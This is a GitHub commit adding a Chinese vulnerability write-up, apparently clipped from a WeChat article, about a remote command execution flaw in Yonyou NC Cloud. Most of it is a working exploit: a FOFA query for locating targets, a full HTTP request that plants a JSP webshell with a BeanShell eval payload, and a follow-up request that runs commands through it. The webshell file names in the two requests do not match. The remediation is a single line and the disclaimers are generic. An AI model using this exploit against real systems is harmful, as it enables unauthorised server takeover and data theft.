Skip to content

Commit

Permalink
Upload new file: 用友 NC Cloud 前台远程命令执行漏洞.md via simpread
Browse files Browse the repository at this point in the history
  • Loading branch information
MrWQ committed Aug 28, 2023
1 parent 8566c20 commit 3b5e0c2
Showing 1 changed file with 78 additions and 0 deletions.
78 changes: 78 additions & 0 deletions bugs/用友 NC Cloud 前台远程命令执行漏洞.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,78 @@
> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/M057A5KF4LN9Crd_SlS4ZQ)
**漏洞简介**

NC Cloud 是用友推出的大型企业数字化平台。用友网络科技股份有限公司 NC Cloud 存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。

**影响版本**

![](https://mmbiz.qpic.cn/mmbiz_png/n2rSqJSRAVycxaw03LaQHib0E68oSXe0JiacEpbkEk3VOQliankS63f8EaLfchtgGxibBHLT4ccPRxVphJ9Af9OL8A/640?wx_fmt=png)

**FOFA 语句**

```
app="用友-NC-Cloud"
```

![](https://mmbiz.qpic.cn/mmbiz_png/n2rSqJSRAVycxaw03LaQHib0E68oSXe0JIT7VAvAfNh3iacia0egTBpGWkxiboP2qw2wia9Vh0HAQbmCwj11cDicxP4g/640?wx_fmt=png)

**漏洞复现**

抓包如下:

![](https://mmbiz.qpic.cn/mmbiz_png/n2rSqJSRAVycxaw03LaQHib0E68oSXe0JzRXhRiauEAOnak1sBcAfHOG1xefqiapWMT6JPpv9Cob4TBVAK2mLtbOA/640?wx_fmt=png)

上传 123456789.jsp 的 webshell

```
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: ****
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Sat, 22 May 2021 12:02:46 GMT
If-None-Match: W/"1957-1621684966000"
Content-Length: 255
Content-Type: application/x-www-form-urlencoded
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/123456789.jsp"]}
```

![](https://mmbiz.qpic.cn/mmbiz_png/n2rSqJSRAVycxaw03LaQHib0E68oSXe0Jhv81DvrpibqjCKvEkmHGUM5GyoibPFvNqpicmsOZQZftib4LXmIibbQqTibA/640?wx_fmt=png)

执行 ipconfig 命令

```
POST /823780482.jsp?error=bsh.Interpreter HTTP/1.1
Host: *****
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Sat, 22 May 2021 12:02:46 GMT
If-None-Match: W/"1957-1621684966000"
Content-Length: 100
Content-Type: application/x-www-form-urlencoded
cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("ipconfig").getInputStream())
```

![](https://mmbiz.qpic.cn/mmbiz_png/n2rSqJSRAVycxaw03LaQHib0E68oSXe0JEhbws6BpDuyLuFBXENLQM8CsJR2C8lOstHd9DvURdx1R6TWDVCOS9A/640?wx_fmt=png)

**修复建议**

建议升级至最新版本

![](https://mmbiz.qpic.cn/mmbiz_jpg/n2rSqJSRAVysra7ItOufZQ85GXBSX9vYa0PicnDzIv4xibegRTm4976s4ZMcq0Ke9uH8TG8RqC4ZbaXK33IrmicxA/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1)

**本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。**

**由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。**公众号**内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!**

**敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。**

0 comments on commit 3b5e0c2

Please sign in to comment.